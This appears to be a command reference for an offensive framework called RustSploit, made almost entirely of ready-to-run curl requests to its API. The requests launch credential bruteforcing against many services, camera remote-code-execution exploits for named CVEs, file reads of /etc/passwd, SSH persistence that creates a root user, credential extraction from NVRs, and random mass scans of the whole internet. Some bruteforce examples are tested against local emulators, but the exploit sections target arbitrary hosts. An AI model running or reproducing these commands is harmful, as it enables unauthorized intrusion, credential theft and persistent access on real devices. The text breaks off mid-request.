# RustSploit API — Template Commands (Tested & Verified)
# ═══════════════════════════════════════════════════════════════
# Tested against emulated servers (test_servers.py)
# Default creds: admin/password123, root/toor
# SNMP community: public
#
# API Key: testkey123 (replace with your actual key)
# Wordlists: Absolute paths to test_users.txt, test_passwords.txt
#
# Start API:  cargo run -- --api --api-key testkey123 --interface 127.0.0.1
# Start test: python3 test_servers.py
# ═══════════════════════════════════════════════════════════════

# ─── Health Check ────────────────────────────────────────────────────

curl -s http://127.0.0.1:8080/health | python3 -m json.tool

# ─── List Modules ───────────────────────────────────────────────────

curl -s http://127.0.0.1:8080/api/modules \
  -H 'Authorization: Bearer testkey123' | python3 -m json.tool

# ─── Search Modules ─────────────────────────────────────────────────

curl -s "http://127.0.0.1:8080/api/modules/search?q=ssh" \
  -H 'Authorization: Bearer testkey123' | python3 -m json.tool

# ─── Set Target ─────────────────────────────────────────────────────

curl -s -X POST http://127.0.0.1:8080/api/target \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{"target": "127.0.0.1"}' | python3 -m json.tool

# ─── Set Target (CIDR subnet) ──────────────────────────────────────

curl -s -X POST http://127.0.0.1:8080/api/target \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{"target": "192.168.1.0/24"}' | python3 -m json.tool

# ─── Show Target ────────────────────────────────────────────────────

curl -s http://127.0.0.1:8080/api/target \
  -H 'Authorization: Bearer testkey123' | python3 -m json.tool

# ─── List Result Files ──────────────────────────────────────────────

curl -s http://127.0.0.1:8080/api/results \
  -H 'Authorization: Bearer testkey123' | python3 -m json.tool

# ─── Get Result File ────────────────────────────────────────────────

curl -s http://127.0.0.1:8080/api/results/ssh_results.txt \
  -H 'Authorization: Bearer testkey123' | python3 -m json.tool

# ═══════════════════════════════════════════════════════════════
# BRUTEFORCE MODULES — Tested against emulated servers
# save_results: "y" enables output file creation
# CIDR: use target like "127.0.0.1/32" or "192.168.1.0/24"
# ═══════════════════════════════════════════════════════════════

# ─── 1. SSH Bruteforce ──────────────────────────────────────────────
# TESTED ✅ — Found root:toor against emulated SSH on port 2222
# save_results ✅ — Saved to ssh_results.txt
# CIDR ✅ — Subnet detected, sequential per-host scanning

curl -s --max-time 120 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "creds/generic/ssh_bruteforce",
    "target": "127.0.0.1",
    "prompts": {
      "port": "2222",
      "use_defaults": "n",
      "use_username_wordlist": "y",
      "username_wordlist": "/home/kali/Pictures/Jenkins/rustsploit-thekiaboys/test_users.txt",
      "use_password_wordlist": "y",
      "password_wordlist": "/home/kali/Pictures/Jenkins/rustsploit-thekiaboys/test_passwords.txt",
      "concurrency": "5",
      "timeout": "5",
      "retry_on_error": "n",
      "stop_on_success": "y",
      "save_results": "y",
      "output_file": "ssh_results.txt",
      "verbose": "n",
      "combo_mode": "y",
      "save_unknown_responses": "n"
    }
  }' | python3 -m json.tool

# SSH CIDR example:
curl -s --max-time 120 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "creds/generic/ssh_bruteforce",
    "target": "127.0.0.1/32",
    "prompts": {
      "port": "2222",
      "use_defaults": "n",
      "use_username_wordlist": "y",
      "username_wordlist": "/home/kali/Pictures/Jenkins/rustsploit-thekiaboys/test_users.txt",
      "use_password_wordlist": "y",
      "password_wordlist": "/home/kali/Pictures/Jenkins/rustsploit-thekiaboys/test_passwords.txt",
      "concurrency": "5",
      "timeout": "5",
      "retry_on_error": "n",
      "stop_on_success": "y",
      "save_results": "y",
      "output_file": "ssh_cidr_results.txt",
      "verbose": "n",
      "combo_mode": "y",
      "save_unknown_responses": "n"
    }
  }' | python3 -m json.tool

# ─── 2. FTP Bruteforce ──────────────────────────────────────────────
# No emulator available. save_results and CIDR implemented.

curl -s --max-time 120 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "creds/generic/ftp_bruteforce",
    "target": "10.0.0.1",
    "prompts": {
      "port": "21",
      "username_wordlist": "/home/kali/Pictures/Jenkins/rustsploit-thekiaboys/test_users.txt",
      "password_wordlist": "/home/kali/Pictures/Jenkins/rustsploit-thekiaboys/test_passwords.txt",
      "concurrency": "10",
      "stop_on_success": "y",
      "save_results": "y",
      "output_file": "ftp_results.txt",
      "verbose": "n",
      "combo_mode": "y"
    }
  }' | python3 -m json.tool

# ─── 3. SMTP Bruteforce ────────────────────────────────────────────
# TESTED ✅ — Found root:toor against emulated SMTP on port 2525
# save_results ✅ — Saved to smtp_results.txt

curl -s --max-time 120 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "creds/generic/smtp_bruteforce",
    "target": "127.0.0.1",
    "prompts": {
      "port": "2525",
      "username_wordlist": "/home/kali/Pictures/Jenkins/rustsploit-thekiaboys/test_users.txt",
      "password_wordlist": "/home/kali/Pictures/Jenkins/rustsploit-thekiaboys/test_passwords.txt",
      "threads": "5",
      "delay_ms": "100",
      "stop_on_success": "y",
      "combo_mode": "y",
      "verbose": "n",
      "save_results": "y",
      "output_file": "smtp_results.txt"
    }
  }' | python3 -m json.tool

# ─── 4. POP3 Bruteforce ────────────────────────────────────────────
# TESTED ✅ — Found root:toor against emulated POP3 on port 1110
# save_results ✅ — Saved to pop3_results.txt

curl -s --max-time 120 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "creds/generic/pop3_bruteforce",
    "target": "127.0.0.1",
    "prompts": {
      "use_ssl": "n",
      "port": "1110",
      "username_wordlist": "/home/kali/Pictures/Jenkins/rustsploit-thekiaboys/test_users.txt",
      "password_wordlist": "/home/kali/Pictures/Jenkins/rustsploit-thekiaboys/test_passwords.txt",
      "threads": "5",
      "delay_ms": "50",
      "timeout": "5",
      "combo_mode": "y",
      "stop_on_success": "y",
      "save_results": "y",
      "output_file": "pop3_results.txt",
      "verbose": "n",
      "retry_on_error": "n"
    }
  }' | python3 -m json.tool

# ─── 5. MQTT Bruteforce ────────────────────────────────────────────
# TESTED ✅ — Found root:toor + admin:password123 against emulated MQTT on port 1884
# save_results ✅

curl -s --max-time 120 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "creds/generic/mqtt_bruteforce",
    "target": "127.0.0.1",
    "prompts": {
      "port": "1884",
      "use_tls": "n",
      "test_anonymous": "n",
      "username_wordlist": "/home/kali/Pictures/Jenkins/rustsploit-thekiaboys/test_users.txt",
      "password_wordlist": "/home/kali/Pictures/Jenkins/rustsploit-thekiaboys/test_passwords.txt",
      "concurrency": "5",
      "timeout": "5",
      "stop_on_success": "y",
      "save_results": "y",
      "output_file": "mqtt_results.txt",
      "verbose": "n",
      "combo_mode": "y",
      "client_id": "rustsploit"
    }
  }' | python3 -m json.tool

# MQTT CIDR example:
curl -s --max-time 120 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "creds/generic/mqtt_bruteforce",
    "target": "127.0.0.1/32",
    "prompts": {
      "port": "1884",
      "use_tls": "n",
      "username_wordlist": "/home/kali/Pictures/Jenkins/rustsploit-thekiaboys/test_users.txt",
      "password_wordlist": "/home/kali/Pictures/Jenkins/rustsploit-thekiaboys/test_passwords.txt",
      "concurrency": "5",
      "verbose": "n",
      "output_file": "mqtt_cidr_results.txt",
      "client_id": "rustsploit"
    }
  }' | python3 -m json.tool

# ─── 6. SNMP Bruteforce ────────────────────────────────────────────
# TESTED ✅ — Found community 'public' against emulated SNMP on port 1161
# save_results ✅ — Saved to snmp_results.txt

curl -s --max-time 120 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "creds/generic/snmp_bruteforce",
    "target": "127.0.0.1",
    "prompts": {
      "port": "1161",
      "community_wordlist": "/home/kali/Pictures/Jenkins/rustsploit-thekiaboys/test_communities.txt",
      "snmp_version": "2c",
      "concurrency": "5",
      "stop_on_success": "y",
      "save_results": "y",
      "output_file": "snmp_results.txt",
      "verbose": "n",
      "timeout": "3"
    }
  }' | python3 -m json.tool

# ─── 7. RTSP Bruteforce ────────────────────────────────────────────
# TESTED ✅ — Found admin:password123 + root:toor against emulated RTSP on port 5554
# save_results ✅ — Saved to rtsp_results.txt

curl -s --max-time 120 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "creds/generic/rtsp_bruteforce",
    "target": "127.0.0.1",
    "prompts": {
      "port": "5554",
      "username_wordlist": "/home/kali/Pictures/Jenkins/rustsploit-thekiaboys/test_users.txt",
      "password_wordlist": "/home/kali/Pictures/Jenkins/rustsploit-thekiaboys/test_passwords.txt",
      "concurrency": "5",
      "stop_on_success": "y",
      "save_results": "y",
      "output_file": "rtsp_results.txt",
      "verbose": "n",
      "combo_mode": "y",
      "advanced_mode": "n",
      "brute_force_paths": "n"
    }
  }' | python3 -m json.tool

# ─── 8. Telnet Bruteforce ─────────────────────────────────────────
# TESTED ✅ — Module runs, mode 4 quick default check works
# Mode 4 = Quick Default Check (built-in credential list)
# Mode 1 = Single Target with custom wordlists

# Mode 4: Quick default check
curl -s --max-time 120 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "creds/generic/telnet_bruteforce",
    "target": "127.0.0.1",
    "prompts": {
      "mode": "4",
      "port": "2323",
      "verbose": "n",
      "stop_on_success": "y",
      "save_results": "y",
      "output_file": "telnet_results.txt"
    }
  }' | python3 -m json.tool

# Mode 1: Single target with custom wordlists
curl -s --max-time 120 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "creds/generic/telnet_bruteforce",
    "target": "127.0.0.1",
    "prompts": {
      "mode": "1",
      "port": "2323",
      "username_wordlist": "/home/kali/Pictures/Jenkins/rustsploit-thekiaboys/test_users.txt",
      "password_wordlist": "/home/kali/Pictures/Jenkins/rustsploit-thekiaboys/test_passwords.txt",
      "output_file": "telnet_results.txt",
      "delay_ms": "100",
      "verbose": "n",
      "stop_on_success": "y",
      "save_results": "y",
      "timeout": "5",
      "threads": "5"
    }
  }' | python3 -m json.tool

# ─── 9. RDP Bruteforce ─────────────────────────────────────────────
# Requires xfreerdp on the system. No emulated server available.
# save_results and CIDR implemented.

curl -s --max-time 300 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "creds/generic/rdp_bruteforce",
    "target": "10.0.0.1",
    "prompts": {
      "port": "3389",
      "username_wordlist": "/home/kali/Pictures/Jenkins/rustsploit-thekiaboys/test_users.txt",
      "password_wordlist": "/home/kali/Pictures/Jenkins/rustsploit-thekiaboys/test_passwords.txt",
      "concurrency": "5",
      "timeout": "10",
      "stop_on_success": "y",
      "save_results": "y",
      "output_file": "rdp_results.txt",
      "verbose": "n",
      "combo_mode": "y",
      "security_level": "1"
    }
  }' | python3 -m json.tool

# ─── 10. Fortinet SSL VPN Bruteforce ────────────────────────────────
# HTTPS module. Emulated server on port 4443.
# save_results and CIDR implemented.

curl -s --max-time 300 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "creds/generic/fortinet_bruteforce",
    "target": "127.0.0.1",
    "prompts": {
      "port": "4443",
      "username_wordlist": "/home/kali/Pictures/Jenkins/rustsploit-thekiaboys/test_users.txt",
      "password_wordlist": "/home/kali/Pictures/Jenkins/rustsploit-thekiaboys/test_passwords.txt",
      "concurrency": "3",
      "timeout": "10",
      "stop_on_success": "y",
      "save_results": "y",
      "output_file": "fortinet_results.txt",
      "verbose": "n",
      "combo_mode": "y",
      "trusted_cert": "",
      "realm": ""
    }
  }' | python3 -m json.tool

# ─── 11. L2TP Bruteforce ──────────────────────────────────────────
# L2TP/CHAP protocol. Emulated server on port 1701 (UDP).
# save_results and CIDR implemented.

curl -s --max-time 120 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "creds/generic/l2tp_bruteforce",
    "target": "127.0.0.1",
    "prompts": {
      "port": "1701",
      "username_wordlist": "/home/kali/Pictures/Jenkins/rustsploit-thekiaboys/test_users.txt",
      "password_wordlist": "/home/kali/Pictures/Jenkins/rustsploit-thekiaboys/test_passwords.txt",
      "concurrency": "3",
      "timeout_ms": "5000",
      "stop_on_success": "y",
      "save_results": "y",
      "output_file": "l2tp_results.txt",
      "verbose": "n",
      "combo_mode": "y"
    }
  }' | python3 -m json.tool

# ═══════════════════════════════════════════════════════════════
# CIDR SUBNET SCANNING EXAMPLES
# All modules support arbitrary CIDR targets (e.g. /24, /28, /32)
# ═══════════════════════════════════════════════════════════════

# CIDR SSH (sequential per-host):
curl -s --max-time 300 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "creds/generic/ssh_bruteforce",
    "target": "192.168.1.0/28",
    "prompts": {
      "port": "22",
      "use_defaults": "n",
      "use_username_wordlist": "y",
      "username_wordlist": "/home/kali/Pictures/Jenkins/rustsploit-thekiaboys/test_users.txt",
      "use_password_wordlist": "y",
      "password_wordlist": "/home/kali/Pictures/Jenkins/rustsploit-thekiaboys/test_passwords.txt",
      "concurrency": "10",
      "timeout": "5",
      "retry_on_error": "n",
      "stop_on_success": "n",
      "save_results": "y",
      "output_file": "ssh_subnet_results.txt",
      "verbose": "n",
      "combo_mode": "y",
      "save_unknown_responses": "n"
    }
  }' | python3 -m json.tool

# CIDR SMTP (concurrent mass_scan_host):
curl -s --max-time 300 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "creds/generic/smtp_bruteforce",
    "target": "192.168.1.0/28",
    "prompts": {
      "port": "25",
      "username_wordlist": "/home/kali/Pictures/Jenkins/rustsploit-thekiaboys/test_users.txt",
      "password_wordlist": "/home/kali/Pictures/Jenkins/rustsploit-thekiaboys/test_passwords.txt",
      "concurrency": "50",
      "verbose": "n",
      "output_file": "smtp_subnet_results.txt"
    }
  }' | python3 -m json.tool

# CIDR SNMP (concurrent mass_scan_host):
curl -s --max-time 300 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "creds/generic/snmp_bruteforce",
    "target": "192.168.1.0/24",
    "prompts": {
      "port": "161",
      "community_wordlist": "/home/kali/Pictures/Jenkins/rustsploit-thekiaboys/test_communities.txt",
      "snmp_version": "2c",
      "concurrency": "50",
      "stop_on_success": "n",
      "save_results": "y",
      "output_file": "snmp_subnet_results.txt",
      "verbose": "n",
      "timeout": "3"
    }
  }' | python3 -m json.tool

# ═══════════════════════════════════════════════════════════════
# CAMERA EXPLOIT MODULES  (added 2026-03-17)
# All modules now fully API-compatible via cfg_prompt_* wrappers.
# Interactive CLI/shell behaviour is UNCHANGED — prompts fall back
# to stdin when not in API mode.
# Prompt keys match the key names documented in each module's
# cfg_prompt_* calls.
# ═══════════════════════════════════════════════════════════════

# ─── 12. ACTi ACM-5611 RCE ──────────────────────────────────────────
# Single target (check vuln + run command):
curl -s --max-time 30 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "exploits/cameras/acti/acm_5611_rce",
    "target": "192.168.1.100",
    "prompts": { "port": "8080", "command": "id" }
  }' | python3 -m json.tool

# CIDR subnet scan:
curl -s --max-time 120 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "exploits/cameras/acti/acm_5611_rce",
    "target": "192.168.1.0/24",
    "prompts": { "port": "8080" }
  }' | python3 -m json.tool

# Mass scan (infinite random):
curl -s --max-time 30 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "exploits/cameras/acti/acm_5611_rce",
    "target": "0.0.0.0",
    "prompts": {
      "port": "8080",
      "exclude_ranges": "y",
      "output_file": "acti_hits.txt",
      "concurrency": "100"
    }
  }' | python3 -m json.tool

# ─── 13. AVTech Camera CVE-2024-7029 RCE ────────────────────────────
# Single target (runs vuln check, then interactive shell in CLI mode):
curl -s --max-time 30 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "exploits/cameras/avtech/cve_2024_7029_avtech_camera",
    "target": "192.168.1.101",
    "prompts": { "port": "80" }
  }' | python3 -m json.tool

# Mass scan (infinite random, exclude RFC1918):
curl -s --max-time 30 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "exploits/cameras/avtech/cve_2024_7029_avtech_camera",
    "target": "0.0.0.0",
    "prompts": { "exclude_ranges": "y" }
  }' | python3 -m json.tool

# ─── 14. Hikvision CVE-2021-36260 RCE ──────────────────────────────
# mode 1=safe check  2=reboot check  3=run cmd+read output  4=blind cmd
# 5=interactive shell (CLI only)  6=SSH shell via dropbear
# Mass scan: scan_mode 1=safe / 2=unsafe reboot / 3=custom payload (max 22 chars)

# Single target — safe vuln check:
curl -s --max-time 30 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "exploits/cameras/hikvision/hikvision_rce_cve_2021_36260",
    "target": "192.168.1.102",
    "prompts": { "mode": "1" }
  }' | python3 -m json.tool

# Single target — execute command + read output (max 22-char cmd):
curl -s --max-time 30 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "exploits/cameras/hikvision/hikvision_rce_cve_2021_36260",
    "target": "192.168.1.102",
    "prompts": { "mode": "3", "command": "id" }
  }' | python3 -m json.tool

# Single target — unsafe reboot check (confirm required):
curl -s --max-time 30 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "exploits/cameras/hikvision/hikvision_rce_cve_2021_36260",
    "target": "192.168.1.102",
    "prompts": { "mode": "2", "confirm_reboot": "y" }
  }' | python3 -m json.tool

# Mass scan — safe check:
curl -s --max-time 30 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "exploits/cameras/hikvision/hikvision_rce_cve_2021_36260",
    "target": "0.0.0.0",
    "prompts": {
      "exclude_ranges": "y",
      "output_file": "hikvision_hits.txt",
      "scan_mode": "1"
    }
  }' | python3 -m json.tool

# Mass scan — custom payload (max 22 chars):
curl -s --max-time 30 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "exploits/cameras/hikvision/hikvision_rce_cve_2021_36260",
    "target": "0.0.0.0",
    "prompts": {
      "exclude_ranges": "y",
      "output_file": "hikvision_rce_hits.txt",
      "scan_mode": "3",
      "custom_payload": "id>webLib/x"
    }
  }' | python3 -m json.tool

# ─── 15. ABUS CVE-2023-26609 (LFI / RCE / SSH Persistence) ─────────
# mode 1=LFI  mode 2=RCE  mode 3=SSH persistence
# Mass scan: scan_mode 1=standard check  2=custom command

# Single target — LFI:
curl -s --max-time 30 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "exploits/cameras/abus/abussecurity_camera_cve202326609variant1",
    "target": "192.168.1.103",
    "prompts": { "mode": "1", "filepath": "/etc/passwd" }
  }' | python3 -m json.tool

# Single target — RCE:
curl -s --max-time 30 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "exploits/cameras/abus/abussecurity_camera_cve202326609variant1",
    "target": "192.168.1.103",
    "prompts": { "mode": "2", "command": "id" }
  }' | python3 -m json.tool

# Single target — SSH persistence (new root user):
curl -s --max-time 30 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "exploits/cameras/abus/abussecurity_camera_cve202326609variant1",
    "target": "192.168.1.103",
    "prompts": { "mode": "3", "password": "H@ckedR00t!" }
  }' | python3 -m json.tool

# Mass scan — standard RCE check:
curl -s --max-time 30 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "exploits/cameras/abus/abussecurity_camera_cve202326609variant1",
    "target": "0.0.0.0",
    "prompts": {
      "exclude_ranges": "y",
      "output_file": "abus_hits.txt",
      "scan_mode": "1"
    }
  }' | python3 -m json.tool

# Mass scan — custom command:
curl -s --max-time 30 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "exploits/cameras/abus/abussecurity_camera_cve202326609variant1",
    "target": "0.0.0.0",
    "prompts": {
      "exclude_ranges": "y",
      "output_file": "abus_rce_hits.txt",
      "scan_mode": "2",
      "custom_command": "id"
    }
  }' | python3 -m json.tool

# ─── 16. Reolink CVE-2019-11001 (Authenticated RCE) ─────────────────
# Requires valid credentials.
curl -s --max-time 30 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "exploits/cameras/reolink/reolink_rce_cve_2019_11001",
    "target": "192.168.1.104",
    "prompts": {
      "username": "admin",
      "password": "admin123",
      "command": "id"
    }
  }' | python3 -m json.tool

# ─── 17. Uniview NVR Password Disclosure ────────────────────────────
# Unauthenticated. Extracts + decodes all user credentials.
curl -s --max-time 30 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "exploits/cameras/uniview/uniview_nvr_pwd_disclosure",
    "target": "192.168.1.105",
    "prompts": { "output_file": "uniview_creds.txt" }
  }' | python3 -m json.tool

# ─── 18. FTP Anonymous Login — Mass Scan ────────────────────────────
# target "0.0.0.0" = infinite random internet scan

curl -s --max-time 30 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "creds/generic/ftp_anonymous",
    "target": "0.0.0.0",
    "prompts": {
      "concurrency": "500",
      "verbose": "n",
      "output_file": "ftp_anon_results.txt",
      "use_exclusions": "y"
    }
  }' | python3 -m json.tool

# Single target FTP anon check (no prompts needed):
curl -s --max-time 20 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "creds/generic/ftp_anonymous",
    "target": "192.168.1.200"
  }' | python3 -m json.tool

# ─── 19. CamXploit — Camera Discovery / Exploitation Scanner ────────
# Fingerprints open ports, tests default creds, detects RTSP streams.

# Single target:
curl -s --max-time 60 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "creds/camxploit/camxploit",
    "target": "192.168.1.150"
  }' | python3 -m json.tool

# Subnet:
curl -s --max-time 120 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "creds/camxploit/camxploit",
    "target": "192.168.1.0/24"
  }' | python3 -m json.tool

# Mass random internet scan:
curl -s --max-time 30 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "creds/camxploit/camxploit",
    "target": "0.0.0.0",
    "prompts": {
      "concurrency": "200",
      "output_file": "camxploit_results.txt"
    }
  }' | python3 -m json.tool

# ═══════════════════════════════════════════════════════════════
# SCANNER MODULES  (added 2026-03-19)
# All scanner modules now fully API-compatible via cfg_prompt_*
# wrappers. Interactive CLI/shell behaviour is UNCHANGED.
# Prompt keys match the key names documented in config.rs
# and each module's cfg_prompt_* calls.
# ═══════════════════════════════════════════════════════════════

# ─── 20. Port Scanner ──────────────────────────────────────────────
curl -s --max-time 60 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "scanners/port_scanner",
    "target": "192.168.1.1",
    "prompts": {
      "port_range": "1-1024",
      "scan_method": "1",
      "concurrency": "200",
      "timeout": "3",
      "show_only_open": "y",
      "verbose": "n",
      "output_file": ""
    }
  }' | python3 -m json.tool

# ─── 21. SSH Scanner (Banner Grab) ───────────────────────────────
curl -s --max-time 60 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "scanners/ssh_scanner",
    "target": "192.168.1.1",
    "prompts": {
      "port": "22",
      "additional_targets": "",
      "load_from_file": "n",
      "threads": "10",
      "timeout": "5",
      "save_results": "y",
      "output_file": "ssh_scan_results.txt"
    }
  }' | python3 -m json.tool

# ─── 22. DNS Recursion Scanner ───────────────────────────────────
curl -s --max-time 30 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "scanners/dns_recursion",
    "target": "8.8.8.8",
    "prompts": {
      "port": "53",
      "domain": "google.com",
      "record_type": "A"
    }
  }' | python3 -m json.tool

# ─── 23. HTTP Title Scanner ──────────────────────────────────────
curl -s --max-time 60 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "scanners/http_title_scanner",
    "target": "192.168.1.1",
    "prompts": {
      "additional_targets": "",
      "target_file": "",
      "check_http": "y",
      "check_https": "y",
      "use_ports": "n",
      "timeout": "10",
      "save_results": "y",
      "verbose": "n"
    }
  }' | python3 -m json.tool

# ─── 24. HTTP Method Scanner ────────────────────────────────────
curl -s --max-time 60 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "scanners/http_method_scanner",
    "target": "192.168.1.1",
    "prompts": {
      "additional_targets": "",
      "target_file": "",
      "scheme": "https",
      "use_ports": "n",
      "timeout": "10",
      "verbose": "n",
      "save_results": "y"
    }
  }' | python3 -m json.tool

# ─── 25. SMTP User Enum ─────────────────────────────────────────
curl -s --max-time 120 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "scanners/smtp_user_enum",
    "target": "192.168.1.1",
    "prompts": {
      "mode": "1",
      "port": "25",
      "wordlist": "/usr/share/wordlists/usernames.txt",
      "threads": "10",
      "timeout_ms": "3000",
      "verbose": "n",
      "save_valid": "y",
      "valid_output": "smtp_valid_users.txt"
    }
  }' | python3 -m json.tool

# ─── 26. Ping Sweep ─────────────────────────────────────────────
curl -s --max-time 120 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "scanners/ping_sweep",
    "target": "192.168.1.0/24",
    "prompts": {
      "add_manual_targets": "n",
      "load_from_file": "n",
      "timeout": "3",
      "concurrency": "100",
      "verbose": "n",
      "save_up_hosts": "y",
      "up_hosts_file": "ping_sweep_up_hosts.txt",
      "save_down_hosts": "n",
      "use_icmp": "y",
      "use_tcp": "n",
      "use_syn": "n",
      "use_ack": "n"
    }
  }' | python3 -m json.tool

# ─── 27. Directory Brute Force ──────────────────────────────────
curl -s --max-time 120 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "scanners/dir_brute",
    "target": "192.168.1.1",
    "prompts": {
      "mode": "1",
      "target": "192.168.1.1",
      "use_https": "y",
      "port": "443",
      "base_path": "/",
      "wordlist": "/usr/share/wordlists/dirb/common.txt",
      "save_results": "y",
      "sort_by": "1"
    }
  }' | python3 -m json.tool

# ─── 28. Sequential Fuzzer ──────────────────────────────────────
curl -s --max-time 120 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "scanners/sequential_fuzzer",
    "target": "http://192.168.1.1/",
    "prompts": {
      "mode": "1",
      "min_length": "1",
      "max_length": "3",
      "verbose": "n"
    }
  }' | python3 -m json.tool

# ─── 29. API Endpoint Scanner ───────────────────────────────────
curl -s --max-time 120 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "scanners/api_endpoint_scanner",
    "target": "https://192.168.1.1",
    "prompts": {
      "output_dir": "api_scan_results",
      "use_spoofing": "n",
      "use_generic_payload": "y",
